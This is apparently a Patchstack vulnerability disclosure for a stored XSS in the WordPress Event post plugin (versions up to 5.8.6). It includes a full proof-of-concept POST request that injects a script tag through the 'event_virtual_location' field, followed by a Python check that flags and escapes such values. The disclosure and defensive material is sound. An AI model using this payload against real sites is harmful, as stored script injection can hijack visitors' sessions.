XSS in location field
Vulnerability description
From Darius
thiennv discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Event post Plugin to Patchstack.
How to reproduce
Event post <= 5.8.6 - Stored XSS
POST /wordpress/wp-admin/post.php?post=968&action=edit&meta-box-loader=1&meta-box-loader-nonce=6b6bec58d8&_locale=user HTTP/1.1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wpnonce"
3a2f47678c
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post-new.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="user_ID"
2
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="action"
editpost
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="originalaction"
editpost
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_type"
post
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="original_post_status"
auto-draft
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="referredby"
http://thiennv.com/wordpress/wp-admin/edit.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_original_http_referer"
http://thiennv.com/wordpress/wp-admin/edit.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="auto_draft"
1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_ID"
968
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="meta-box-order-nonce"
6ddaa3c8f1
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="closedpostboxesnonce"
a883b861c5
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="samplepermalinknonce"
adc7fe713f
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_attendance_mode"
OnlineEventAttendanceMode
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_virtual_location"
"><script>alert(origin)</script>
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_address"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_latitude"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="geo_longitude"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="eventpost_nonce"
118649891c
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/post-new.php
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_status"
EventScheduled
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_begin"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_end"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_color"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="event_icon"
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="comment_status"
open
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="ping_status"
open
-----------------------------1877358560354103854685944162
Content-Disposition: form-data; name="post_author"
2
-----------------------------1877358560354103854685944162--
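A defensive check for requests like the one above, added here as an example (not code from the plugin or from the original report): it parses a multipart/form-data body and flags watched fields whose values contain characters that can close an HTML attribute or open a tag, alongside the value as it would look once escaped for output. The watched-field list, the boundary and the shortened sample body are constructed assumptions; the field names and the reported value come from the request on this page.

```python
import html
import re
from email import message_from_bytes

# Characters that let a value close an HTML attribute or open a tag.
HTML_BREAKOUT = re.compile(r"[<>\"'`]")
# Field names from the request on this page; treating them as plain text is an assumption.
WATCHED_FIELDS = {"event_virtual_location", "geo_address", "event_color", "event_icon"}


def parse_form_data(content_type: str, body: bytes) -> list[tuple[str, str]]:
    """Parse a multipart/form-data body into (field name, value) pairs."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    pairs = []
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        value = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        pairs.append((name, value))  # a list keeps repeated names such as _wp_http_referer
    return pairs


def flag_fields(pairs: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """Return (name, raw value, HTML-escaped value) for watched fields carrying markup."""
    return [
        (name, value, html.escape(value, quote=True))
        for name, value in pairs
        if name in WATCHED_FIELDS and HTML_BREAKOUT.search(value)
    ]


def build_body(pairs: list[tuple[str, str]], boundary: str) -> bytes:
    """Build a well-formed multipart body (used only to construct the sample)."""
    tmpl = '--{b}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
    body = "".join(tmpl.format(b=boundary, n=n, v=v) for n, v in pairs)
    return (body + f"--{boundary}--\r\n").encode()


# Constructed sample: a shortened version of the request shown above.
BOUNDARY = "constructed-boundary"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_BODY = build_body([
    ("event_attendance_mode", "OnlineEventAttendanceMode"),
    ("event_virtual_location", '"><script>alert(origin)</script>'),
    ("geo_address", ""),
    ("event_status", "EventScheduled"),
], BOUNDARY)

if __name__ == "__main__":
    print(flag_fields(parse_form_data(CONTENT_TYPE, SAMPLE_BODY)))
```

The escaped form is what a template should emit when it places the stored value inside an attribute; a flagged field in a saved request means the value reached the server unsanitized, not that it was rendered.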